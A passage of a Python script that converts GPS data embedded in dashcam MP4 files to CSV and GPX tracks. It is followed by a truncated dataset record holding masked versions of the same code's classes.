\x3C\xDB\x17\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\x18\xB5\x18\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\xA0\xFE\x19\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\x20\xF9\x1B\x00\x00\x00\x00\x00\x80\x01\x00\x00\x01\x00\x00\x00\
\xAC\xB3\x1C\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00'
def parse_mp4_file(mp4_file_path: pathlib.Path) -> List[TrackPoint]:
track_points = []
with open(mp4_file_path, 'rb') as mp4_file:
gps_data_block_indices = get_gps_data_block_indices(mp4_file)
for gps_data_block_index in gps_data_block_indices:
mp4_file.seek(gps_data_block_index.position)
if mp4_file.tell() != gps_data_block_index.position:
error_position = gps_data_block_index.position
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' a GPS data block, but got EOF.')
large_block_size = mp4_file.read(4)
if len(large_block_size) < 4:
error_position = format(
mp4_file.tell() - len(large_block_size), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
the size of a GPS data block, but got EOF.')
large_block_size = int.from_bytes(large_block_size, 'big')
if large_block_size != gps_data_block_index.size:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f'{mp4_file_path}:{error_position}: The\
size of a GPS data block is not equal to the one stored in the index.')
large_block_end = mp4_file.tell() - 4 + large_block_size
signature = mp4_file.read(8)
if len(signature) < 8:
error_position = format(mp4_file.tell() - len(signature),
'#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
the signature of a GPS data block, but got EOF.')
signature = signature.decode('UTF-8')
if signature != 'freeGPS ':
error_position = format(mp4_file.tell() - 8, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
`freeGPS ' as the signature of a GPS data block, but got `{signature}'.")
small_block_size = mp4_file.read(4)
if len(small_block_size) < 4:
error_position = format(
mp4_file.tell() - len(small_block_size), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
the size of a GPS data block, but got EOF.')
small_block_size = int.from_bytes(small_block_size, 'little')
if small_block_size != 88:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
`88' as the size of a GPS data block, but got `{small_block_size}'.")
small_block_end = mp4_file.tell() + small_block_size
padding = mp4_file.read(32)
if len(padding) < 32:
error_position = format(mp4_file.tell() - len(padding),
'#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' zero padding, but got EOF.')
for j, b in enumerate(padding):
if b != 0:
error_position = format(mp4_file.tell() - 32 + j, '#010x')
byte = format(b, '#04x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
hour = mp4_file.read(4)
if len(hour) < 4:
error_position = format(mp4_file.tell() - len(hour), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' the hour of time, but got EOF.')
hour = int.from_bytes(hour, 'little')
if hour < 0 or 24 <= hour:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the hour of time, but got an invalid value `{hour}'.")
minute = mp4_file.read(4)
if len(minute) < 4:
error_position = format(mp4_file.tell() - len(minute), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' the minute of time, but got EOF.')
minute = int.from_bytes(minute, 'little')
if minute < 0 or 60 <= minute:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the minute of time, but got an invalid value `{minute}'.")
second = mp4_file.read(4)
if len(second) < 4:
error_position = format(mp4_file.tell() - len(second), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' the second of time, but got EOF.')
second = int.from_bytes(second, 'little')
if second < 0 or 60 <= second:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the second of time, but got an invalid value `{second}'.")
year = mp4_file.read(4)
if len(year) < 4:
error_position = format(mp4_file.tell() - len(year), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' the year of time, but got EOF.')
year = int.from_bytes(year, 'little')
if year == 0:
error_position = format(mp4_file.tell() - 4, '#010x')
if hour != 0:
raise GpsDataError(f"{mp4_file.name}:{error_position}:"
" `year == 0' but `hour != 0'.")
if minute != 0:
raise GpsDataError(f"{mp4_file.name}:{error_position}:"
" `year == 0' but `minute != 0'.")
if second != 0:
raise GpsDataError(f"{mp4_file.name}:{error_position}:"
" `year == 0' but `second != 0'.")
else:
year += 2000
month = mp4_file.read(4)
if len(month) < 4:
error_position = format(mp4_file.tell() - len(month), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' the month of time, but got EOF.')
month = int.from_bytes(month, 'little')
if month == 0:
if year != 0:
raise GpsDataError(f"{mp4_file.name}:{error_position}:"
" `year != 0' but `month == 0'.")
assert(hour == 0)
assert(minute == 0)
assert(second == 0)
elif month < 1 or 12 < month:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the month of time, but got an invalid value `{month}'.")
day = mp4_file.read(4)
if len(day) < 4:
error_position = format(mp4_file.tell() - len(day), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' the day of time, but got EOF.')
day = int.from_bytes(day, 'little')
if day == 0:
if year != 0:
raise GpsDataError(f"{mp4_file.name}:{error_position}:"
" `year != 0' but `day == 0'.")
assert(month == 0)
assert(hour == 0)
assert(minute == 0)
assert(second == 0)
elif day < 1 or 31 < day:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the day of time, but got an invalid value `{day}'.")
if year == 0:
assert(month == 0)
assert(day == 0)
assert(hour == 0)
assert(minute == 0)
assert(second == 0)
time = None
else:
time = datetime.datetime.now(datetime.timezone.utc)
time = time.astimezone()
time = time.replace(
year=year, month=month, day=day, hour=hour, minute=minute,
second=second, microsecond=0)
time = Time(time)
if time is None:
padding = mp4_file.read(4)
if len(padding) < 4:
error_position = format(mp4_file.tell() - len(padding),
'#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}:'
' Expect zero-padding, but got EOF.')
padding = int.from_bytes(padding, 'little')
if padding != 0:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(
f"{mp4_file.name}:{error_position}: Expect"
f" zero-padding, but got `{padding}'.")
status = None
latitude_type = '0'
longitude_type = '0'
else:
status = mp4_file.read(1)
if len(status) < 1:
error_position = format(mp4_file.tell() - len(status),
'#010x')
raise GpsDataError(
f'{mp4_file.name}:{error_position}: Expect a status'
' character, but got EOF.')
status = status.decode('UTF-8')
if status not in ('A', 'V'):
error_position = format(mp4_file.tell() - 1, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect `A' or `V' as a status character, but got an invalid character\
`{status}'.")
latitude_type = mp4_file.read(1)
if len(latitude_type) < 1:
error_position = format(
mp4_file.tell() - len(latitude_type), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}:\
Expect a latitude type, but got EOF.')
latitude_type = latitude_type.decode('UTF-8')
if status == 'A':
if latitude_type not in ('N', 'S'):
error_position = format(mp4_file.tell() - 1, '#010x')
raise GpsDataError(
f"{mp4_file.name}:{error_position}: Expect `N' or\
`S' as a latitude type, but got an invalid character `{latitude_type}'.")
else:
assert(status == 'V')
if latitude_type != '0':
error_position = format(mp4_file.tell() - 1, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect `0' as a latitude type, but got an invalid character\
`{latitude_type}'.")
longitude_type = mp4_file.read(1)
if len(longitude_type) < 1:
error_position = format(
mp4_file.tell() - len(longitude_type), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}:\
Expect a longitude type, but got EOF.')
longitude_type = longitude_type.decode('UTF-8')
if status == 'A':
if longitude_type not in ('E', 'W'):
error_position = format(mp4_file.tell() - 1, '#010x')
raise GpsDataError(
f"{mp4_file.name}:{error_position}: Expect `E' or\
`W' as a longitude type, but got an invalid character `{longitude_type}'.")
else:
assert(status == 'V')
if longitude_type != '0':
error_position = format(mp4_file.tell() - 1, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect `0' as a longitude type, but got an invalid character\
`{longitude_type}'.")
padding = mp4_file.read(1)
if len(padding) < 1:
error_position = format(mp4_file.tell() - len(padding),
'#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}:'
' Expect zero padding, but got EOF.')
if padding[0] != 0:
error_position = format(mp4_file.tell() - 1, '#010x')
byte = format(padding[0], '#04x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
if status == 'A':
latitude_dmm = read_little_endian_single(mp4_file)
latitude_degree = math.floor(latitude_dmm / 100)
if latitude_degree < 0 or 90 < latitude_degree:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.")
latitude_minute = latitude_dmm - latitude_degree * 100
if latitude_minute < 0 or 60 <= latitude_minute:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.")
latitude_degree += latitude_minute / 60
latitude = Latitude(latitude_degree)
else:
assert(status == 'V' or status is None)
padding = mp4_file.read(4)
if len(padding) < 4:
error_position = format(
mp4_file.tell() - len(padding), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}:'
' Expect zero padding, but got EOF.')
for j, b in enumerate(padding):
if b != 0:
error_position = format(
mp4_file.tell() - 4 + j, '#010x')
byte = format(b, '#04x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
latitude = None
if status == 'A':
longitude_dmm = read_little_endian_single(mp4_file)
longitude_degree = math.floor(longitude_dmm / 100)
if longitude_degree < 0 or 180 < longitude_degree:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect a longitude in DMM format, but got an invalid value\
`{longitude_dmm}'.")
longitude_minute = longitude_dmm - longitude_degree * 100
if longitude_minute < 0 or 60 <= longitude_minute:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect a longitude in DMM format, but got an invalid value\
`{longitude_dmm}'.")
longitude_degree += longitude_minute / 60
longitude = Longitude(longitude_degree)
else:
assert(status == 'V' or status is None)
padding = mp4_file.read(4)
if len(padding) < 4:
error_position = format(
mp4_file.tell() - len(padding), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}:'
' Expect zero padding, but got EOF.')
for j, b in enumerate(padding):
if b != 0:
error_position = format(
mp4_file.tell() - 4 + j, '#010x')
byte = format(b, '#04x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
longitude = None
speed = read_little_endian_single(mp4_file)
# Presume that speed is recorded in knots.
speed *= (1852 / 3600)
speed = Speed(speed)
azimuth = read_little_endian_single(mp4_file)
if azimuth < 0 or 360 <= azimuth:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
azimuth degree, but got an invalid value `{azimuth}'.")
azimuth = Azimuth(azimuth)
x_acceleration = mp4_file.read(4)
if len(x_acceleration) < 4:
error_position = format(
mp4_file.tell() - len(x_acceleration), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' X-axis acceleration, but got EOF.')
x_acceleration = int.from_bytes(
x_acceleration, 'little', signed=True)
y_acceleration = mp4_file.read(4)
if len(y_acceleration) < 4:
error_position = format(
mp4_file.tell() - len(y_acceleration), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' Y-axis acceleration, but got EOF.')
y_acceleration = int.from_bytes(
y_acceleration, 'little', signed=True)
z_acceleration = mp4_file.read(4)
if len(z_acceleration) < 4:
error_position = format(
mp4_file.tell() - len(z_acceleration), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
' Z-axis acceleration, but got EOF.')
z_acceleration = int.from_bytes(
z_acceleration, 'little', signed=True)
if mp4_file.tell() != small_block_end:
error_position = format(mp4_file.tell(), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
the end of a GPS data block, but got additional data.')
padding_size = large_block_end - small_block_end
if padding_size < 532:
error_position = format(mp4_file.tell(), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
more than or equal to 532-byte padding, but got only {padding_size}-byte\
padding.')
padding = mp4_file.read(padding_size)
if len(padding) < padding_size:
error_position = format(
mp4_file.tell() - len(padding), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
{padding_size}-byte padding, but got EOF.')
for j, b in enumerate(padding[:420]):
if b != 0:
error_position = format(small_block_end + j, '#010x')
byte = format(b, '#04x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
# `_UNKNOWN_BYTES` may appear in the zero padding. However,
# what this means is unknown. Therefore, just skip it if it
# appears.
if padding[420:532] != _UNKNOWN_BYTES:
for j, b in enumerate(padding[420:532]):
if b != 0:
error_position = format(small_block_end + 420 + j,
'#010x')
byte = format(b, '#04x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
for j, b in enumerate(padding[532:]):
if b != 0:
error_position = format(small_block_end + 532 + j, '#010x')
byte = format(b, '#04x')
raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
track_point = TrackPoint(
time, status, latitude, longitude, speed, azimuth,
x_acceleration, y_acceleration, z_acceleration)
track_points.append(track_point)
return track_points
def read_input_paths(input_paths: List[pathlib.Path]) -> List[TrackPoint]:
track_points = []
for input_path in input_paths:
if input_path.is_dir():
file_paths = []
for dirpath, dirnames, filenames in os.walk(input_path):
dirpath = pathlib.Path(dirpath)
for filename in filenames:
file_path = dirpath / filename
if file_path.suffix not in ('.mp4', '.MP4'):
continue
file_paths.append(file_path)
file_paths.sort()
for file_path in file_paths:
track_points.extend(parse_mp4_file(file_path))
else:
track_points.extend(parse_mp4_file(input_path))
return track_points
def write_csv_file(args: Arguments,
track_points: List[TrackPoint]) -> pathlib.Path:
if args.name is None:
print("`--name' is required to output a CSV file.", file=sys.stderr)
sys.exit(1)
csv_file_path = pathlib.Path(f'{args.name}.csv')
if csv_file_path.exists():
if not args.overwrite:
print(f"{csv_file_path}: File already exists.", file=sys.stderr)
sys.exit(1)
with open(csv_file_path, 'w') as csv_file:
for track_point in track_points:
print(track_point.format_as_csv(), file=csv_file)
return csv_file_path
def create_track_segments(
args: Arguments, track_points: List[TrackPoint]) -> List[TrackSegment]:
new_track_points = []
for track_point in track_points:
if track_point.status != 'A':
assert(track_point.latitude is None)
assert(track_point.longitude is None)
continue
assert(track_point.latitude is not None)
assert(track_point.longitude is not None)
new_track_points.append(track_point)
track_points = new_track_points
track_points.sort()
if len(track_points) == 0:
return []
unique_track_points = []
it = iter(track_points)
representative_track_point = next(it)
while True:
track_point = next(it, None)
if track_point is None:
unique_track_points.append(representative_track_point)
break
if track_point.time != representative_track_point.time:
unique_track_points.append(representative_track_point)
representative_track_point = track_point
continue
if track_point.latitude == representative_track_point.latitude\
and track_point.longitude == representative_track_point.longitude:
continue
if args.how_to_unique == 'first':
continue
elif args.how_to_unique == 'last':
representative_track_point = track_point
else:
raise RuntimeError("There exist track points with the same\
timestamp but different coordinates. Use `--uniq' option.")
track_segments = []
track_segments.append(TrackSegment())
for track_point in unique_track_points:
track_segments[0].append_track_point(track_point)
return track_segments
def as_xml_attribute(data: str) -> str:
return xml.sax.saxutils.quoteattr(data)
def as_xml_data(data: str) -> str:
return xml.sax.saxutils.escape(data)
def get_local_time_in_iso8601() -> str:
utc_now = datetime.datetime.now(datetime.timezone.utc)
local_aware_now = utc_now.astimezone()
local_time_in_iso8601 = local_aware_now.strftime('%Y-%m-%dT%H:%M:%S%z')
return re.sub('([+-]\\d{2})(\\d{2})$', '\\1:\\2', local_time_in_iso8601)
def write_gpx_file(args: Arguments,
track_segments: List[TrackSegment]) -> pathlib.Path:
all_track_points = []
for track_segment in track_segments:
for track_point in track_segment:
all_track_points.append(track_point)
name = args.name
if name is None:
if len(all_track_points) == 0:
raise ValueError(
"`--name' is not specified, and there is no track point.")
all_track_points.sort()
name = all_track_points[0].name
gpx_file_path = pathlib.Path(f'{name}.gpx')
bounds = None
if len(all_track_points) > 0:
latitudes = list(t.latitude for t in all_track_points)
latitudes.sort()
longitudes = list(t.longitude for t in all_track_points)
longitudes.sort()
bounds = (latitudes[0], longitudes[0], latitudes[-1], longitudes[-1])
if gpx_file_path.exists():
if not args.overwrite:
print(f'{gpx_file_path}: Error: File already exists.',
file=sys.stderr)
sys.exit(1)
with open(gpx_file_path, 'w') as gpx_file:
print('<?xml version="1.0" encoding="UTF-8" standalone="no" ?>',
file=gpx_file)
print('<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1"'
' creator="papago2gpx">', file=gpx_file)
print(' <metadata>', file=gpx_file)
print(f' <name>{as_xml_data(name)}</name>', file=gpx_file)
if args.description is not None:
description = as_xml_data(args.description)
print(f' <desc>{description}</desc>', file=gpx_file)
if args.author_name is not None or args.author_email is not None:
print(' <author>', file=gpx_file)
if args.author_name is not None:
author_name = as_xml_data(args.author_name)
print(f' <name>{author_name}</name>', file=gpx_file)
if args.author_email is not None:
author_email_parts = args.author_email.split('@', 1)
if len(author_email_parts) != 2:
raise RuntimeError(
f'An invalid E-mail address: {args.author_email}')
author_email_id = as_xml_attribute(author_email_parts[0])
author_email_domain = as_xml_attribute(author_email_parts[1])
print(f' <email id={author_email_id}\
domain={author_email_domain}/>', file=gpx_file)
print(' </author>', file=gpx_file)
if args.copyright is not None:
copyright = as_xml_attribute(args.copyright)
print(f' <copyright author={copyright}', end='', file=gpx_file)
copyright_year = args.copyright_year
copyright_license = args.copyright_license
if copyright_year is not None or copyright_license is not None:
print('>', file=gpx_file)
if copyright_year is not None:
copyright_year = as_xml_data(str(copyright_year))
print(f' <year>{copyright_year}</year>',
file=gpx_file)
if copyright_license is not None:
copyright_license = as_xml_data(copyright_license)
print(f' <license>{copyright_license}</license>',
file=gpx_file)
print(' </copyright>', file=gpx_file)
else:
print('/>', file=gpx_file)
print(f' <time>{get_local_time_in_iso8601()}</time>', file=gpx_file)
if args.keywords is not None:
keywords = as_xml_data(args.keywords)
print(f' <keywords>{keywords}</keywords>', file=gpx_file)
if bounds is not None:
print(f' <bounds minlat="{bounds[0]}" minlon="{bounds[1]}"\
maxlat="{bounds[2]}" maxlon="{bounds[3]}"/>', file=gpx_file)
print(' </metadata>', file=gpx_file)
print(' <trk>', file=gpx_file)
if args.track_name is not None:
track_name = as_xml_data(args.track_name)
print(f' <name>{track_name}</name>', file=gpx_file)
if args.track_comment is not None:
track_comment = as_xml_data(args.track_comment)
print(f' <cmt>{track_comment}</cmt>', file=gpx_file)
if args.track_description is not None:
track_description = as_xml_data(args.track_description)
print(f' <desc>{track_description}</desc>', file=gpx_file)
if args.track_type is not None:
track_type = as_xml_data(args.track_type)
print(f' <type>{track_type}</type>', file=gpx_file)
for track_segment in track_segments:
print(' <trkseg>', file=gpx_file)
for track_point in track_segment:
print(f' <trkpt lat="{track_point.latitude}"\
lon="{track_point.longitude}">', file=gpx_file)
print(f' <time>{track_point.time}</time>',
file=gpx_file)
print(' </trkpt>', file=gpx_file)
print(' </trkseg>', file=gpx_file)
print(' </trk>', file=gpx_file)
print('</gpx>', file=gpx_file)
proc = subprocess.run(
['xmllint', '--schema', 'gpx.xsd', str(gpx_file_path)],
stdin=subprocess.DEVNULL, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, encoding='UTF-8')
if proc.returncode != 0:
print(f"""Failed to validate the GPX file `{gpx_file_path}'.
command: {proc.args}
stdout: {proc.stdout}
stderr: {proc.stderr}
returncode: {proc.returncode}""", file=sys.stderr)
return gpx_file_path
if __name__ == '__main__':
args = Arguments()
track_points = read_input_paths(args.input_paths)
csv_file_path = write_csv_file(args, track_points)
print(f"Succeeded! The result is output to `{csv_file_path}'.")
track_segments = create_track_segments(args, track_points)
if args.name is None and len(track_segments) == 0:
print("`--name' is not specified, and there is no track segment.",
file=sys.stderr)
sys.exit(1)
if len(track_segments) == 0:
print('WARNING: There is no track segment.', file=sys.stderr)
gpx_file_path = write_gpx_file(args, track_segments)
print(f"Succeeded! The result is output to `{gpx_file_path}'.")
sys.exit(0)
|
normal
|
{
"blob_id": "fbb1254c7166fa2aa9cd8a0b9c6525dbe5b652a0",
"index": 2625,
"step-1": "<mask token>\n\n\nclass GpsDataBlockIndex(object):\n\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) ->int:\n return self._position\n\n @property\n def size(self) ->int:\n return self._size\n\n\n<mask token>\n\n\nclass Time(object):\n\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) ->datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) ->str:\n result = self._time.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) ->str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude\n ], longitude: Optional[Longitude], speed: Speed, azimuth: Azimuth,\n x_acceleration: int, y_acceleration: int, z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, latitude = {latitude}'\n )\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, longitude = {longitude}'\n )\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) ->Time:\n return self._time\n\n @property\n def status(self) ->str:\n return self._status\n\n @property\n def latitude(self) ->Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) ->Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) ->Speed:\n return self._speed\n\n @property\n def azimuth(self) ->Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) ->int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) ->int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) ->int:\n return self._z_acceleration\n\n @property\n def name(self) ->str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) ->str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) ->str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return (self._time == other._time and self._latitude == other.\n _latitude and self._longitude == other._longitude)\n\n\nclass TrackSegment(object):\n\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) ->None:\n self._track_points.append(track_point)\n\n def __len__(self) ->int:\n return len(self._track_points)\n\n def __iter__(self) ->Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Arguments(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def author_name(self) ->Optional[str]:\n return self._author_name\n <mask token>\n\n @property\n def copyright(self) ->Optional[str]:\n return self._copyright\n <mask token>\n <mask token>\n\n @property\n def keywords(self) ->Optional[str]:\n return self._keywords\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass BrokenMp4FileError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataBlockIndex(object):\n\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) ->int:\n return self._position\n\n @property\n def size(self) ->int:\n return self._size\n\n\n<mask token>\n\n\nclass Time(object):\n\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) ->datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) ->str:\n result = self._time.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) ->str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude\n ], longitude: Optional[Longitude], speed: Speed, azimuth: Azimuth,\n x_acceleration: int, y_acceleration: int, z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, latitude = {latitude}'\n )\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, longitude = {longitude}'\n )\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) ->Time:\n return self._time\n\n @property\n def status(self) ->str:\n return self._status\n\n @property\n def latitude(self) ->Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) ->Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) ->Speed:\n return self._speed\n\n @property\n def azimuth(self) ->Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) ->int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) ->int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) ->int:\n return self._z_acceleration\n\n @property\n def name(self) ->str:\n local_time = self._time.as_local_time()\n return 